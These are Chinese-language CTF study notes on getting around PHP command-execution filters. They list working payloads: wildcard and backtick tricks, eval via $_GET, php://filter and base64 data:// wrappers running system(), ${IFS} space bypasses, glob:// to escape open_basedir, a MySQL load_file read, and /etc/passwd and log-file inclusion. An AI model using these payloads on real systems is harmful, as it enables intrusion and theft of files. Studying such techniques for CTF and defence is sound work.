命令执行:
eval类
1.过滤flag:
(1)用通配符绕过?c=system('cat f*');
? (2)复制:system("cp fla*.php 1.txt")
? ? ? 执行文件:1.txt
?2.过滤flag,php,system(对命令执行函数进行过滤)
命令执行函数
因为system被过滤这里可用反引号绕过
?c=echo `cat f*`;?
?c=eval($_GET[1]);&1=system('cat flag.php');
3.过滤flag,system,php,空格和单引号,cat
空格绕过:
cat被过滤:
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
伪协议data
?c=data://text/plain,<?=system("cp f* 1.txt");?>
过滤了php用base64绕过
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=(<?php system("cat f*");)
;的使用
伪协议
md5
eval() 函数把字符串按照 PHP 代码来计算
system和evel还是有区别的,它是命令执行而不是代码执行。evel是代码执行而不是命令执行
file_get_contents('')
mv:重命名
?c=mv${IFS}fla?????${IFS}z.txt
<?=短标签:可以代替php 作为开头是echo()快捷用法
绕过include包含下的php过滤
?c=data://text/plain,<?= system('cat fl*');?>
也可以直接用base64绕过
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=
无美元符号 冒号引号冒号构造无参函数进行文件读取
一.无参数任意文件读取,查看当前目录文件名
scandir('.')以下方法获取'.'
1.print_r(scandir(current(localeconv())))查看当前目录所有文件名
array_reverse逆转数组
next
current==pos(如果都被过滤了可使用reset():该函数返回数组第一个单元的值)
2.chr(46)就是‘.’
chr(rand())x
chr(time());
chr()函数以256为一个周期,所以chr(46),chr(302),chr(558)都等于"."
所以使用chr(time()),一个周期必定出现一次"."
chr(current(localtime(time()))):
数组第一个值每秒+1,所以最多60秒就一定能得到46,用current(pos)就能获得"."
二.读取当前目录文件
get_defined_vars():返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量
dev/null 2>&1的含义:就是黑洞,输入内容不显示出来(不回显)
%09只是个符号(不会被数字过滤和%过滤影响)
当<>和?同时使用不回显 所以用\代替?
根目录打开ls /
grep test *file #在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行
https://blog.csdn.net/solitudi/article/details/109837640
https://www.cnblogs.com/NPFS/p/13797436.html
https://blog.csdn.net/tomyyyyyy/article/details/115403458
https://blog.csdn.net/qq_49480008/article/details/113177878
https://www.cnblogs.com/tinywan/p/6025468.html
https://www.freebuf.com/articles/system/242482.html
c=/bin/c??${IFS}????????
异或自增取反?
var_dump(get_defined_vars());拿到所有的注册变量
c=var_export(scandir('/'));
ob_get_contents — 返回输出缓冲区的内容
ob_end_clean — 清空(擦除)缓冲区并关闭输出缓冲
include文件包含用伪协议读flag
open_basedir绕过:
1.glob伪协议:glob伪协议在筛选目录时不受open_basedir制约
c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');} exit(0);
2.利用ini_set读取文件内容
uaf
c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);
c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);
?c=grep${IFS}'{'${IFS}fl???php
判断window系统还是linux系统
index.php?file=win.ini
index.php?file=/etc/passwd
哪个报错就是另外一个
??file=/var/log/nginx/access.log(日志文件)
intval()函数用来获取整数值,当参数base为0的时候,遇到字母就会停止
hp有个特殊的字母:e,可以表示科学计数法
但是当intval()读取到e的时候就会停止
strpos()查找字符第一次出现的位置
md5() 函数不能处理数组,数组都返回 null,md5(a[]) 结果为 null。